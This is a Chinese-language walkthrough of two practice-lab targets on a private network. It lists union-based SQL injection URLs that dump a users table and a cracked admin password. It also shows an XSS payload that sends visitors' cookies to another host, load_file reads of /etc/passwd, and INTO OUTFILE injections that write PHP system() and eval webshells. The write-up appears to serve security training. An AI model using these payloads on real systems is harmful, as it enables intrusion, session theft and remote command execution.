一、SQL注入

首先搭建虚拟机 用kali扫描下当前网段 发现一个192.168.1.134的可疑ip地址

使用nmap扫描端口 发现该ip开启了ftp和http两个服务

打开该虚拟机提供的网页 发现网站使用url传参 可能存在sql注入点

在id=1后加一个引号，网页报错 该网站存在sql注入漏洞

使用order by语句试出网站后台数据库表的列数 当order by 5 时网页报错 因此该查询涉及到四列元素

使用联合查询 查看网页的显示位

得到显示位就可以显示数据库的名字 photoblog

得到数据库名字 可以顺藤摸瓜查询数据库中有那些表

http://192.168.1.134/cat.php?id=1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

由于是要拿到 root 权限 因此我们只需关系user表中的数据 可以看出users表中有 id login password 三列元素

http://192.168.1.134/cat.php?id=1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

检索id，login，password

http://192.168.1.134/cat.php?id=1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

admin的密码：8efe310f9ab3efeae8d410a8e0166eb2

密码为：P4ssw0rd

登录网站后的界面：

 上传一句话木马

字节过大，3-8个字节

改扩展名发现可以上传：

 

用菜刀输入：木马位置从而对网站进行管理：

二、XSS攻击：

 netdiscover 和 nmap 双管齐下 得到靶机的网络信息 提供了80服务

登录发现是个留言板 尝试使用 xss 弹个窗

发现有弹窗回显 存在 xss 漏洞

在靶机上留言<script>document.write('<img src="http://192.168.112.132/?'+document.cookie+' "/>')</script>

可以将任意登录用户的cookie发送到指定ip 在指定 ip 接受 cookie 后可以伪造成登陆者

刷新下页面，发现已经已admin的身份登录进页面中。

进入管理界面后，发现博客编辑界面存在sql注入漏洞。

 

http://192.168.1.135/admin/edit.php?id=4 union select 1,2,3,4

发现2和3可以显示出来。

http://192.168.1.135/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

可以读取passwd文件，但是不能读取shadow文件。我们尝试能不能创建一个文件。

在编辑页面发现错误提示中有/var/www/classes 目录

尝试后发现/var/www/css 目录可写。

于是构造语句：

http://192.168.1.135/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.1.135/css/s.php

 

 

说明s.php文件成功写入到/var/www/css 目录，下面将

<?php system($_GET['c']); ?>

写入z.php中，构造url为：

http://192.168.1.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php，并使用uname -a获取系统信息。可以远程执行命令。

下面写入一句话木马，构造url：

http://192.168.1.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22